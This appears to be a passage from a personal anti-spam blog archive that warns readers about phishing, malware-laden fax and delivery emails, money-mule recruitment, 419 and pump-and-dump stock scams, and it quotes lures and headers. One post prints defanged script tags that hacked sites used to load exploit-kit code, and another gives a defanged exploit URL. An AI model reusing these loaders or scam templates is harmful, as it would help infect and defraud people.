Note: (I deactivated the hostile link for your safety)

Here are some pertinent details about this scam.

Continue reading "New Phishing scam targeting American Express card holders" »

Posted by Wiz at 5:27 PM | Permalink

back to top ^

January 21, 2014

Today's article is about a long established email scam that claims to deliver a fax or faxes inside an attached file. Last year, the majority of these scams pretended to come from eFax, which is a well established fax to email provider. However, the current batch are now spoofing RingCentral as the sender.

The emails that are spoofing RingCentral all have a similar construction to this recent spam message:

From: "Ralph Brock" <[email protected]>
Subject: New Fax Message on 01/15/2013

Body (plain) text:

You Have a New Fax Message
From: (607) 009-4357
Received: Wednesday, January 15, 2014 at 11:34 AM
Pages: 4
To view this message, please open the attachment.
Thank you for using RingCentral.

In this case the attached file was simply named "fax.zip" which contained a .exe Trojan installer.

Messages like this are mostly targeting businesses, many of whom do business using fax exchanges. The goal in these instances is to install information stealing malware onto networked computers. The opportunity for cyber thieves is tremendous if they can get a key person to open such a file and allow it to be installed onto her or his office computer. Company secrets as well as bank accounts are stolen this way every day.

Continue reading "Beware of an email scam spoofing faxes from Ring Central" »

Posted by Wiz at 12:50 PM | Permalink

back to top ^

January 13, 2014

Today I received an unusual email sent to one of my most rarely used accounts. In what turned out to be a malicious scam, the subject was: "Passing of your friend." That subject is certainly written to get your attention! The following was in the body text.

The Amos Family

Funeral Announcement
Hereby we want to share your sorrow for your dear friend who passed away on Friday, January 10, 2014.
You are cordially invited to express your sympathy in memory of your friend at a celebration of life service that will be held on Monday, January 13, 2014 at the Ocker Funeral Home, Arkansas.

Please find more detailed information about the memorial service here.

Sincerely,
Funeral Home Secretary,
Mateo
Little

The word "here" contains a link to to a website in the Netherlands (youtubeforum.nl). The destination URL, which you can read on a PC by hovering over the link without clicking any buttons, is buried two folders under the root, in an aliased location named "/Funeral." Landing on that URL initiates the download of a file named: "FuneralProcession.zip" - which if opened contains a malicious file named: "FuneralProcession.exe."

Anybody who is tricked into downloading that zip file and opening its executable will have a Trojan installed on their PC. I guess I am the first to report this, as zero of 51 security scanners have looked at this file as of this posting. You can check the results on VirusTotal as the file gets analyzed, here.

In the meantime, if you receive an email like this one, know that it is a scam and delete it. Check the sender field to see if it corresponds to the name of the family or funeral home. In the case of the scam I received, the sender was listed as: "The Amos Family" <[email protected]>. Domains ending in .by are in Belarus, which is located in Eastern Europe, in the former Soviet Union. BY domains are registered to residents or citizens of that country. This email claimed to come from people having a funeral in Arkansas, which is thousands of miles away, on another continent.

The Amos Family name and email account is a forgery. When I traced the location of the sending computer (shown in the normally hidden headers), it too was located in Belarus, at 178.124.156.68, which is in Minsk, BY

So, even without an anti virus program scanning your email, one can see that the sender's email domain and the link URL have no correlation to the funeral notice location.

Stay safe this Winter. Scammers have been ramping up their efforts to infect as many PCs as possible with Trojan downloaders, which in turn download and install bank account stealing malware and other nasties. They will keep changing the subject lines to attract attention and trick you into clicking before thinking. No matter what version of Windows you are using, make sure it is equipped with up-to-date anti-virus and anti-malware programs, just in case you are tricked into clicking on a malicious link.

Posted by Wiz at 12:06 PM | Permalink

back to top ^

October 27, 2013

It's Monday morning and a quick check of my MailWasher Pro recycle bin revealed a slew of work at home scams, with links to websites having .EU extensions. EU represents European domain names. Domain names I have seen are variations of IWillTeachYouToBeRich{3 or 4 characters}.eu/

Many of these domains have already been suspended due to reports from SpamCop, and other spam reporting agencies. The one that is still active at this moment (hosted in China at 111.121.193.200) contains a typical work at home scam promotion, using tons of JavaScript to display a message containing your approximate location. This is known as Geo-targeting. If you live in Chicago, the scam message will say that so and so, a work at home mom, made $8,000 in one month using this program. The copy mentions that you will be working with companies worth over 100 billion dollars.

The landing page is bobby trapped with popup windows to try to prevent you from leaving the site, unless you agree to sign up, or completely close your browser. The payload is a link to purchase "Home Income Kit." This is a money mule scam run by professional con men. People who buy these useless info packs are then solicited to become "mules" in a money laundering or stolen goods reshipper racket.

Sidenote: I write custom spam filters for MailWasher Pro. My filters detect and auto-delete such scams and many others.

Note, all of these work at home websites are blocked by Trend Micro Internet Security programs, which I use and recommend. Even if you knowingly try to visit these pages, Trend's browser protection module blocks them with this unmistakeable notice: "Trend Micro has confirmed that this website can transmit malicious software or has been involved in online scams or fraud."

Posted by Wiz at 11:59 AM | Permalink

back to top ^

August 18, 2013

Last week, I wrote two articles (1 - 2) that revealed that the amount of spam for green coffee bean extract had been surpassed by a big pump and dump campaign, which was pushing two different stocks. Now, the pattern has reversed and weight loss spam exceeds pump and dump.

Regarding the weight loss scams; they no longer mention green coffee bean extract in the spam message bodies. You find this out if you click on the links, which have also morphed from Polish domains (.pl) to Russian domains (.ru). The rest is the same stuff, using Russian underground affiliate template web pages, hosted on Russian web domains. Most of the diet scams I saw this week are spoofing Dr. Oz as the sender, using a couple of different spellings. The message bodies even claim to be official Dr. Oz newsletters, which they are NOT! All of the details are bogus, as is the diet formula they promote.

Note: I researched Green Coffee Bean Extract and found reports on real forums (like WebMD) where most of the people using it got sick from it, until they stopped taking those capsules. The only weight loss was from vomiting, etc.

Pump and Dump

The new pump and dump scam emerging over the last few days is a scam promoting a stock with the symbol MONK. The two previous campaigns seem to be mostly abandoned, after they failed to make the expected profits for the scammers running this dog and pony show. If you are smart, when you see emails promoting MONK, with or without underscores and/or spaces between the capitalized letters, don't be fooled into thinking they are legit. They are scams, run by professional con men, all of whom have conspired to purchase large volumes of shares in the penny stocks they pump up.

As always, the goal of a pump and dump campaign is to pump up interest in a stock, using botnet sent spam messages, driving up the volume of transactions and the value per share. When the value reaches an agreed-upon price, the scammers all sell off their shares, turning a profit for themselves, at the expense of everybody else whom they suckered in.

Today's take-away

1: Green coffee beans won't help you lose weight, but will sicken you and lighten your wallet.
2: Getting involved with a pump and dump stock scam will lighten your bank account when it fails. Further, these are Ponzi Scams, under US law.

Posted by Wiz at 4:46 PM | Permalink

back to top ^

August 11, 2013

Last week I wrote about a new "pump and dump" spam campaign being used to artificially inflate the value of a penny stock, with the trading symbol IMTC (actually renamed to IMTCQB). Spam for this penny stock has exploded over the last week, overtaking all other categories.

The pump and dump email messages are sent by anonymous persons, using spoofed sender information and compromised computers, making grandiose claims about the potential profits for investors. Despite not revealing their actual names, the scammers often use the first person in the subjects or body text, with phrases like "If this company doesn`t Bounce I will RETIRE!"

The purpose of these anonymous email spam messages is to pump of the value of a low value stock by means of trickery, until it peaks. The people behind these stock spam campaigns purchase large volumes of a targeted stock when the price is very, very low. At an agreed upon time they compose an email spam campaign and rent a botnet to disburse fake news and innuendo about the potential trading value of that stock.

Eventually, after enough people have been fooled into investing in this risky endeavor, the value per share goes up, often substantially, in a short time. Then, when the value appears to have peaked, or reaches an agreed upon value, the scammers sell off (dump) all of their holdings at a profit, leaving the later investors holding the empty bag. Thus, it is no surprise that on the Otcmarkets.com page for IMTC, a black skull and crossbones is displayed, with the Caveat Emptor hover text beginning with: buyer beware.

The latest incarnation of these spam messages goes to great length to try to fool potential investors with long paragraphs written in broken English (by scammers whose native language is not English). They are now even including a paragraph of disclaimer language, again using poor English grammar. This should act as a red flag for any North American English reading potential investors (who are the primary targets of this campaign)!

The following is a direct quote, bad grammar included, from one of this weekend's email scams promoting the IMTC stock.

Continue reading "It's time for a reality check regarding IMTC pump and dump stock campaign" »

Posted by Wiz at 12:52 PM | Permalink

back to top ^

June 30, 2013

The overall volume of spam over this past week is greatly reduced, to say the least. Not only have the type of spam subjects become fewer, but the number of malware threats has dropped as well.

The few malware threats that arrived in my MailWasher Pro Inbox were in the form of attached zip files pretending to contain Better Business Bureau complaints (Subject: FW: Complaint Case 2UBG8353D9XLI0Z) or an ADP Payroll invoice (Subject: ADP Payroll INVOICE for week ending 06/21/2013).

Malicious files in email attachments are best managed by an up-to-date anti-virus program that can monitor incoming email messages, as well as files you open before running, such as zip and pdf files. I personally use and recommend Trend Micro Internet security products. It uses "in the cloud" malware definitions for the newest threats, so it doesn't bog your computer down with what would otherwise be a huge virus database on your hard drive (and loaded in RAM memory).

Also, if you operate your computer with less than Administrator privileges, and keep your bullshit detectors on high, you will be about 90% less likely to get infected by most malware, especially the silent install type. The B.S. detectors are for when an installer pops up a UAC prompt asking for the Administrator password to continue.

Continue reading "Email spam, scam and threat round-up for week ending on June 30, 2013" »

Posted by Wiz at 4:33 PM | Permalink

back to top ^

June 12, 2013

I have written about spam issues for many years now, covering junk email selling illicit prescription drugs, bogus weight loss substances, E.D. pills, counterfeit watches, purses and shoes, malware link/attachment threats, as well as financial scams like Nigerian advance fee/overpayment (419), pump and dump penny stocks, work at home ripoffs and fake job offers. Today's article is about the last item.

Some types of spam are always present, like the illicit E.D. pills and Nigerian 419 scams. Every now and then something new comes along and gets spammed out heavily for a while, like the current green coffee weight loss scam. But, these new items tend to disappear when the spammers renting the use of botnets lose money promoting things that their recipients aren't interested in trying. That is why we see different spam topics every few weeks.

Most spam, from the 1978 ARPANET DEC email blast to present, has been to take some of your money for some item or substance. 419 scams get you to pay advance fee money in the false expectation of receiving a fortune in return.

Malware delivered by email is usually meant to steal money from online banking users, or valuable website login credentials (Phishing scams), bank card numbers, and even your identity. Or, it might demand a payment to restore the use of your "locked" computer, or to fix non-existent system problems it claims to have found. This malware is either delivered via an email attachment, or by hyperlinks to a hostile website that exploits vulnerable software that may be installed on your computer or smart device.

Fake employment offers, on the other hand, are meant to get YOU to participate in stealing other people's money, as the middle-man who receives, then remits stolen funds to cybercriminals pretending to be employers. The people who enter into these schemes are known as Money Mules.

Read on to find out how this scam works and what the consequences could be for those who get involved

Continue reading "Beware of email job offers from Money Mule recruiters" »

Posted by Wiz at 12:39 PM | Permalink

back to top ^

June 9, 2013

Since the recent forced shutdown and seizure of Liberty Reserve, a major payment portal used by cybercriminals (and also, unfortunately, many innocent people), spammers and scammers have been experiencing trouble getting paid their ill-gotten money. Nonetheless, certain types of spam continue to flood our inboxes, as shown in this article.

My stats are derived from MailWasher Pro, which is a desktop POP3 and IMAP spam filter that goes between your email server and your email client. The classifications of spam come from spam filters I write and publish for use by other MailWasher Pro users.

SPAM

This week the majority of spam was for counterfeit or useless drugs, most with domain names that begin with "greecoffeeultra." These domains are often registered on the day you begin seeing spam claiming you only have 24 or 48 hours to act, or some similar garbage subject. I did some research into a few of these domains and learned that the ones arriving today were just registered a few hours earlier and are set to expire in just two weeks. The "Registrar" is listed as Domain Silver Inc., in the Seychelles. It is very unusual to allow such a short registration period and it is no surprise that spammers are attracted to this company.

The From addresses are composed in two parts. The first shows a name, like iWellHealth, GreatHealth, or something similar. The second part is the email address, which is totally bogus. They are composed of about 10 or 12 characters of random upper and lower case letters, followed by three digits, then some imaginary or real domain name. I have updated my MailWasher filter for "Known Spam [From] to detect and auto-delete these messages so you don't have to deal with them.

Most of these "greencoffee" domains end in the extension .pl - which stands for Poland. The websites are hosted in the Ukraine and did not return any results when I checked them. But, they are active websites and may be populated with illicit content at any time.

Other drug spam is for Russian domains (.ru), which are only supposed to be registered to Russian citizens. The websites at the end of the links were mostly hosted in ...The Ukraine. They have a big spam hosting problem there.

Continue reading "E-mail spam and scam roundup for June 3 - 9, 2013." »

Posted by Wiz at 3:28 PM | Permalink

back to top ^

May 26, 2013

This past week has seen the return of Russian fake pharmacy spam, including the long-dead "Canadian Pharmacy" name. There was a short lull in this type of spam while other categories of junk email were being deployed; mostly pump and dump stock scams.

Russian pharmacy spam (and all other types) is sent from zombie computers that have become infected and involuntarily made part of spam "botnets." The bot-masters who own these botnets rent them out to spammers who are affiliates for various underworld networks that promote all manner of counterfeit goods (watches, handbags, shoes), illicit prescription drugs, Chinese weight-loss herbs, Russian, Ukrainian and Asian "dating" networks, money mule recruitment (e.g. work at home scams), Nigerian 419 scams, pump and dump stock scams, and malware in attachments or in the destination websites of hostile hyperlinks.

The Russian pharmacies are all template websites run by affiliate spammers, hosted on Russian domains, which end in the extension .ru. There are also some Ukrainian hosted fake pharmacies and dating scam websites hosted on domains ending in .com.ua. If you are able to read the actual destination of a link before you click on it, by hovering, or in plain text, if it ends in .ru, it is hosted on a Russian server, or on an account registered to a Russian citizen. I hope that my readers will not want to subsidize Russian cybercriminals who sell counterfeit drugs or other illicit goods on Russian websites.

Also making a comeback this weekend is an emerging (returning, I believe) pump and dump stock scam revolving around a sub-penny stock with the symbol: BYSD. This stock appears to have been pump and dumped at least once before and is being pumped again, today. Beware of spam messages making outrageous claims about the Bayside Corp stock. It is going nowhere anytime soon, and the only news they have released is to announce a new CEO. Some group has bought up a huge block of their junk stock at .006, or so, and is trying to sucker unsavvy investors into buying thousands of shares at a penny, plus, driving up the price, until the scammers dump all their shares and leave the rest of the investors holding an empty bag.

Continue reading "Spam and email threat roundup for May 19 - 26, 2013" »

Posted by Wiz at 3:54 PM | Permalink

back to top ^

May 21, 2013

PHISHING ALERT FOR COMCAST CUSTOMERS

If you are a Comcast Internet service customer and use a Comcast email account, you too may receive a targeted email scam similar to the one I received tonight, with the subject: "Upgrade your Comcast Account now!" The important portion of the body text follows.

Service Update

Dear Comcast Customer,

You are required to update your Comcast Account by subscribing to our Security Center.
v
If you not perform the update now (sic), your account will be placed on hold.

In order to update your account click here.

There is a hyperlink around the words click here that go directly to a compromised web hosting account where one will find images and words stolen from a real Comcast login page. There is a login form that asks Comcast customers to type in their Comcast user name and password to confirm their identity. Anybody doing so will be handing over their Comcast Internet and Xfinity credentials to cybercriminals in Europe. This will allow them to login to your account and gain access to everything you have inputted, including personally identifiable information and billing details.

This appears to be a targeted attack against Comcast.net email account holders. I have many other domain accounts and none of them has received this scam message. I pray that this information gets in front of your eyes before the phishing email does and stops any of you from mistakenly thinking this is a legitimate message from Comcast.

Continue reading "PHISHING SCAM: "Upgrade your Comcast Account now!"" »

Posted by Wiz at 11:20 PM | Permalink

back to top ^

May 15, 2013

If you have been following my recent Pump and Dump expose, you are aware that the people running the email scam campaign pumping up GTRL have been lying, in order to draw in (sucker) more investors. Today, they ramped up their lies another notch and are falsely claiming that Get Real USA is being bought out. Not so!

If you search for any actual news from Get Real USA (GTRL), all you will find is this recent notice, posted by them on May 9, 2013:

The Company affirms that it has not participated in, condoned nor given permission to any company or individual to send unsolicited e-mail, text messages or any other communications involving the Company, its common shares or any of its products, that individuals may have received over the past week. Investors are cautioned not to rely on the statements made in these types of campaigns, when considering the Company as an investment. The Company does not endorse the use of these emails or promotions to create a market for its stock. Frank Weber President and CEO stated that neither the company management, company board of directors or anyone associated with Get Real USA has been authorized to issue any such communications and all recipients of such should disavow any and all of such communications.

Continue reading "Pump & dump scammers invent more fake news for GTRL" »

Posted by Wiz at 2:26 PM | Permalink

back to top ^

May 9, 2013

I just had to write this brief follow-up to an article I began on Monday, May 6, 2013. I have been outing spammers running pump and dump scams on penny stocks, exposing the way they invent fake news reports and make stock value projections that don't jive with reality.

The scam being perpetrated this week involves a penny stock with the symbol GTRL. The company has already placed an unmissable notice on its landing page, indicating that they are in no way involved with this stock pump and dump spam campaign.

Nonetheless, the idiots behind this latest onslaught of botnet sent pump and dump scam emails are doing their damnedest to try to enlist up more suckers into purchasing GTRL penny stocks. Almost all of the spam messages in my junk folder, since last weekend, are classified as Pump And Dump Scams, by the anti-spam filters I write for MailWasher Pro users and myself.

Those who fall for the terrible English grammar and spelling mistakes in those spam messages would probably go to a place like otcmarkets.com to purchase large blocks of stock in the spammed company. Well, tonight I humored myself and visited the otcmarkets quotes page for GTRL (Get Real Media - a film company). On the right side of the closing price, which is down 18.52% from the measly opening price of a $.0135, to just .011, for all potential fools to see, is a black skull and crossbones symbol! Hovering over that skull symbol (on a desktop or laptop computer, not a smartphone) results in the following overlayed text display:

Continue reading "Pump & dump penny stock scam leads to an otcmarket skull & crossbones" »

Posted by Wiz at 12:08 AM | Permalink

back to top ^

May 7, 2013

Yesterday, May 6, 2013, I published an article on this blog exposing the latest pump and dump scam making the rounds. The scam involves a true "Penny Stock" that is only worth 1 to 1.5 cents US. Despite there being no news from the company, GTRL, scammers have been pumping the hell out of it since the middle of last week.

While there has been no news from the company itself, other than a warning about the pump and dump scam using their symbol, there has been a flurry of fake news coming via the botnet used to send out this spam blast. This news and reports about the trading value increases in GTRL are all phony. I will expose this below.

In the spam messages I intercepted last night and this morning, the scammers claim, with poor spelling and grammar, that the stock is rising in value quickly and will soon reach a certain extraordinary high. Take a look at their (false) claims, after which I will show you what the actual trading charts reveal to be the facts.

Continue reading "How pump and dump scammers lie to sucker investors " »

Posted by Wiz at 11:15 AM | Permalink

back to top ^

May 6, 2013

Since the predicted demise of the SCXN penny stock pump and dump scam, one week ago, a new stock scam has been making the rounds in its place. The new pump and dump of the week has the symbol GTRL (Get Real USA).

GTRL is a true "Penny Stock" - with a trading value of just one cent, last week. Since the pump and dump scam began trading today, the price increased a few percentage points to about 1.5 cents. The (Eastern European) scammers who bought up thousands of shares at a penny, in advance, are hoping to pump up the value to 5 or 6 cents, then dump all of those shares.

According to the text in the email scams, this company is about to make a major announcement that will cause the value of its worthless stock to shoot up. This is total nonsense. The only news published on the actual Get Real Movies website is a disclaimer of them having anything to do with the current stock scam. The following is quoted from the Get Real landing page...

NOTICE! It has come to the management's attention that the GTRL trading symbol has been associated with certain spam emails. The company is working to discover the source of the emails at this time.

GET REAL USA AND ITS OFFICERS, DIRECTORS, CONSULTANTS OR ANY OF ITS AFFILIATES HAVE NOT AUTHORIZED ANY EMAILS TO BE SENT ON THE COMPANY'S BEHALF.

Please do your own due diligence and consult with your financial adviser prior to making any decision related to the purchase of Get REAL USA securities. GTRL is considered to be a "penny stock" . Visit the company's most recent public disclosure statements and relevant company information at: www.otcmarkets.com

Continue reading "GTRL disavows current penny stock email scams" »

Posted by Wiz at 4:44 PM | Permalink

back to top ^

April 28, 2013

One week ago I wrote about a penny stock email scam, pumping up the stock value of a little known company called Scout Explorations; a.k.a. SCXN. I predicted that this pump and dump scam would have the same outcome as almost all such schemes, and it did. All of the gains seen have been wiped out and the value has dropped to where it was last Monday, at the open of trading.

Last Monday, when the scam was very fresh, a lot of people bought shares, driving the value up to 41 cents. This number held for about two days, then began to drop as the early investors cashed out, again as I predicted they would do. At the close of trading on April 26, this pink penny stock was selling for just 28 cents, after dropping all the way to 25 cents. People who bought into the scam on Monday morning made their money back if they sold on Friday. All the rest lost money, except for one group.

The one group who undoubtedly gained money were the ones who bought thousands of shares of SCXN stock while it was at 5 to 15 cents, which it was for many months. The value only began to go up as a result of an offshore email spam run, coming from computers in Belarus. These folks would have earned themselves about 25 to 35 cents a share profit, as they sold (dumped) all of their stock on Tuesday, April 23. You can follow the hourly, daily, weekly, monthly or yearly activity of this penny stock on this Fox Business News page.

Continue reading "SCXN pump and dump scam fails again, as predicted" »

Posted by Wiz at 2:53 PM | Permalink

back to top ^

April 21, 2013

Since Friday, April 19, 2013, I have received over two dozen email spam messages touting a penny stock with the initials SCXN. The purpose of these emails is to pump up interest in this stock and get as many new investors as possible to buy into it on Monday, before it crashes.

Once a predetermined price has been reached, the people already holding the majority of the shares, who also created this scheme, will cash out (dump), leaving all of the other later investors holding stock worth much less than they paid for it.

In order to try to fool spam filters, the authors add an underscore between varying letters in the symbol of the stock being spammed. So, instead of seeing the full abbreviation: SCXN, you would see S_CXN, or SC_XN, or SCX_N. No legitimate email message from a real adviser would need to try to trick spam filters in this manner.

Pump and Dump scams have been around for many years and used to be sent out by newspaper and direct mail advertisements. But, with the popularity of the Internet and availability of cheap spam email services, based in Belarus, Kazakhstan, The Ukraine, Russia, Bulgaria and Latvia (to name but a few), these schemes can be sent to tens of millions of potential dupes for a several hundred dollars.

If you have multiple email accounts and they are already on spam databases, you will receive similar spam messages in each account. Or, if you have just one email account, you will certainly see multiple versions of the current pump and dump promotion on the same weekend. The spammers send multiple messages to the same or related accounts in order to drum up as much illicit profit as possible, in the shortest time. This is because the spam runs usually happen on the weekend, while the stock exchanges are closed. When trading opens on Monday morning, the people who got tricked into investing into the stock scam of the weekend will pour money into penny stocks.

Volume is as important as price to the scammers running these schemes. High volumes of activity on Mondays can give false confidence to some holdouts and cause them to join the feeding frenzy. Once the original stock holders see the price rise to the agreed upon mark, they all cash out at the same time. This causes the value of the remaining stock to drop quickly. By the time trading has halted, these stocks are often trading at a few cents above the starting price that existed at the open of the trading day.

Continue reading "Pump and Dump Stock Scam of the Weekend: SCXN" »

Posted by Wiz at 5:09 PM | Permalink

back to top ^

March 20, 2013

As I predicted on March 17, this week is off to a running start for email-borne malware scams. Today, we are seeing an ongoing spam blast with the subject: DHL delivery report - which contain malware attachments.

Here are some identifying words and phrases you should be looking out for, when (not if) you receive this email message.

Subject: DHL delivery report (or similar)
From: "(A spoofed personal name) - DHL regional manager" <[email protected]>

Body Text: (dozens of lines of HTML precede readable text)

DHL notification
Our company?s courier couldn?t make the delivery of parcel.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: ETBAKPRSU3
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information: If the parcel isn?t received within 15 working days our company will have the right to claim compensation from you for it?s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
DHL Global

The attachment is not a printable label, as claimed, but is the Bredolab botnet downloader/installer.

Continue reading "DHL delivery report email scam delivers malware 'packages'" »

Posted by Wiz at 5:27 PM | Permalink

back to top ^

October 17, 2012

Malware purveyors are busy this week, distributing email scams containing either links to, or attachments containing malware. Thus far, since Monday this week, I have seen several company brands being spoofed to try to fool recipients into clicking on links leading to the Blackhole or Phoenix exploit kits.

These exploit kits are professionally written to take advantage of vulnerabilities in commonly deployed software that interacts with web browsers or email clients. The primary target is Java technology, which is now owned and maintained by Oracle.

Typically, the first round of scams arrive on Monday mornings and spoof business brands such as Intuit, or UPS, or USPS, or scans from an HP ScanJet, or fake invoices, or bogus schedules for company meetings. All of the above arrived in my inbox on Monday and Tuesday. On Wednesday, the brands being spoofed are UPS, LinkedIn and Facebook. They follow particular scam patterns that give them away to people who are aware and use caution before clicking on links.

The Tell-Tale Patterns

Continue reading "Watch out for more malware link email scams this week" »

Posted by Wiz at 11:44 AM | Permalink

back to top ^

For the past few days I have been receiving email scams claiming to come from LinkedIn, some of which are password reset scams, with the latest being an invitation to join somebody's LinkedIn network. Both are scams, with links leading directly to a compromised website that is hosting the BlackHole Exploit Kit.

Let's take a look at the most recent LinkedIn scam: "Join my network on LinkedIn"

The email Subject is: Join my network on LinkedIn.
The (spoofed) From (sender) address is: [email protected].
The Reply_to address is spoofed as: [email protected]
The first Received from line, from the final mail server is:
Received: from [182.182.16.190] (port=1664) - which is definitely not LinkedIn.com. Further details reveal that the message was sent from mail.bucklerboots.com, not LinkedIn.com.

The message body is loaded with images drawn from LinkedIn and text containing the following come-on:
"Mimi Kauffman has indicated you are a Friend ... I'd like to add you to my professional network on LinkedIn.- Mimi Kauffman ... View invitation from Mimi Kauffman (has payload link) ... WHY MIGHT CONNECTING WITH Mimi Kauffman BE A GOOD IDEA? Mimi Kauffman's connections could be useful to you After accepting Mimi Kauffman's invitation, check Mimi Kauffman's connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future."

My apologies to Mimi Kauffman, whoever you are. Contrary to the claim in the message, we are NOT friends and do not know each other. Spammers are using your harvested name in scams, just like they might be using mine or anybody else's. It is a tactic used to gain trust; a con game; "a Joe Job."

The text is much like what a LinkedIn member would receive in a legitimate request. Spammers join LinkedIn so they can gather templates from actual email messages, for use in scam campaigns. Then, they substitute their own poisoned links for LinkedIn links, to drive victims to booby-trapped websites.

Continue reading "Fake Join my network on LinkedIn email scam has links to BlackHole Exploit Kit" »

Posted by Wiz at 12:11 PM | Permalink

back to top ^

May 25, 2012

Today, while reviewing my auto-deleted spam email messages, I found one that I decided to take a closer look at. It is an obvious Money Mule recruitment scam (to spam hunters like me), with the subject: "Re : Re : Please Complete Your Job Application." Let's see where it leads, shall we?

First of all, everything in the headers is garbage. Throw them out, except to report the unwitting sender to SpamCop, which I did. The sender was an open proxy in Greece. The spamvertised link was to a URL shortener service hosted in China.

The bait was as follows:

The salary available for open openings range from $35.77 /hr to $57.62 per hour.
Prior being considered, we will first need you to formally apply.
Please go here to begin the process:

I have seen these exact same words, with only slight variations, for a year or longer. In fact, I write spam filters for MailWasher Pro users which detect these phrases and others, to auto-delete such scams.

I decided to follow the URL shortened link and see where it leads.

Continue reading "New money mule email scams lead to infamous Rock Cruit Management" »

Posted by Wiz at 5:44 PM | Permalink

back to top ^

May 24, 2012

Cyber-criminals are once again ramping up their email scam campaigns to deliver messages with links to malware servers they control. One of the recent scams, happening this week, is a PayPal Payment scam, with links leading to an exploit attack kit.

The most recent PayPal scam arrives in your Inbox with the Subject: "You sent a payment" and a spoofed From address: "[email protected]" <[email protected]>. However, if you were to take a look at the actual normally hidden Header information, you would see that the email came from some other non-related website. The PayPal scam I am looking at came from Brazil:

Received: from [187.56.96.53] (helo=telesp.net.br).

See my article from 2006 for suggestions on how to display email headers.

The PayPal scam message body text is meant to both poke the curiosity of the recipient (by the dollar amount they allegedly sent) and to delay their checking into their PayPal accounts to see if they did make such a payment. Here is how the crooks accomplish these important tasks:

You sent a payment Transaction ID: 2T004487YM209135A
Dear PayPal User, You sent a payment for $334.85 USD to Otis Bauer (or another name). Please note that it may take a little while for this payment to appear in the Recent Activity list on your Account Overview...

This payment was sent using your bank account.By using your bank account to send money...

The call to action that they want victims to perform is NOT to login to their PayPal accounts to investigate this scam (See italicized sentence above), but to click on poisoned links provided amount keywords in the email message body. These inks are wrapped around every word that a PayPal user might normally expect to be available for seeing details about their accounts. The linked words were as follows:

• 2T004487YM209135A


• View the details of this transaction online


• Help Center | Resolution Center | Security Center


• h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_history (not URL in link)


• h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us (not URL in link)

Each one of the above anchor words were wrapped by a link to a compromised website that contained the following contents (placed there when they got hacked):

WAIT PLEASE
Loading...
<script type="text/javascript" src="h**p://REMOVED.com.tr/fu25e3pr/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED-epices.com/X1RrZw4G/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED.com.au/Xsqgw1AK/js.js"></script>


Continue reading "Anatomy of a PayPal email scam leading to malware" »

Posted by Wiz at 1:25 PM | Permalink

back to top ^

May 16, 2012

This article is about cybercriminals taking email exploit attacks to a new level. Tonight, I processed an email scam (to SpamCop) that claimed to come from a service known as 'Bill Me Later' - detailing an online payment I was supposed to have made over the phone. Except, my name is not Dr. Mary Olsen, MD!

The message, which was carbon copied (CC) to dozens of other recipients (whose email addresses were viewable in plain text), started off with the following totally fake text:

"Thank you for making a payment over the phone! We've received your
Bill Me Later® payment of $60.12 and have
applied it to your account."

The scam goes on to list various account numbers and (fake) payment details. It was also loaded with images and clickable links (20) to view many details, including:

Manage your account, Make a payment, View statements, Account Summary, Home, Make a Payment, About Bill Me Later, Offer, Directory, View Statements, Merchant Sign Up, Store, View Account, Summary, FAQs, Register Account
and 4 image links.

What is astoundingly different about this scam is not just the unusually high number of links leading to an exploit kit, but the fact that they all led to different domains. Normally, I see one or two domains used in hostile link scams. Twenty different compromised domain links is a new record for me.

Each one of these 20 links (see compromised website list) leads to a different website, to a sub-directory (folder) containing 8 mixed case alphanumeric characters, then, /index.html. Here is one sample URL (deactivated for your safety): h**p://webprof.ro/Tv2YU8u6/index.html

Continue reading "Spoofed 'Bill Me Later' email has links to 20 Blackhole exploit websites" »

Posted by Wiz at 10:23 PM | Permalink

back to top ^

Today, I received an email containing a Nigerian 419 scam that while laughable for its horrible spelling and punctuation, makes an upfront demand for payment. Normally, these scams hide the fact that victims are asked to pay in advance before the (fake) hundreds of thousands of dollars will be released to the beneficiary (victim).

Let's take a look at this scam from a curiosity point of view.

First of all, the sender has covered his tracks by using compromised email relaying PCs in a botnet. Two computers were used, both belonging to US residents. One belongs to an organization named "Secured Private Network" - which is obviously not so well secured! The second relay occurred via an open relay in a mail server belonging to CrystalTech Web Hosting.

The return path was interesting. It used a (possibly spoofed) account on a Ukrainian domain: [email protected]. However, the From address shows [email protected], which is obviously spoofed.

The message body claims to be from the "United states ambassador to nigeria
Ambassador terence mccauley" - yet it is filled with incorrect grammer, bad spelling and letter cases. I have to believe that any school kid in the USA knows that titles, countries and personal names always have the first letter capitalized.

The scammer claims to have plans to be: "coming to your country for an official meeting and i will be bringing your funds of ($500,000:00) FIVE HUNDRED THOUSAND UNITED STATES DOLLARS {bank draft} along with me." He goes on to demand an up front payment of $250 processing fee! "the cost of registering it is $250 USD the fee must be paid in the next 48 hours via western union."

Finally, to add insult to injury, the scam contains this outrageous statement:

Please, if you know you will not or can not send the requested $250 USD, please, dont bother replying this mail.

You can read the full text of this 419 scam on my SpamCop report

It is the up front, advance fee demands that gave these scams the name 419 scam. You see, section 419 of the Nigerian Penal Code makes it a serious offense to commit financial fraud involving advance fees. Yet, Nigerians go to Internet Cafes every day and mail out thousands of such scams to people in all parts of the World, but especially English speaking people in North America, the United Kingdom and the lands down under.

Never reply to a Nigerian scammer and never give them your phone number! There is no 500 Gs waiting for you, and you are not the beneficiary of anybody who died and left millions in a Nigerian bank. They will bleed you out of all your money with new fees and bribes and never send you the promised funds (because they do not exist). This has happened over and over to greedy people who fall for such scams. W.C. Fields once said "Never wisen up a chump or give a sucker an even break." That is exactly how Nigerian 419 scammers behave. They target the elderly as well as business owners and town clerks.

Posted by Wiz at 11:59 AM | Permalink

back to top ^

For the last week or so, I have seen a steady increase in the number of illicit work at home job scams arriving by email. So far, just this morning, I have seen 5 different subjects, with slightly different "reference" numbers, all spoofed as coming from one of my own email addresses. This coincides with the approaching Black Friday and Christmas shopping season in the US and Canada.

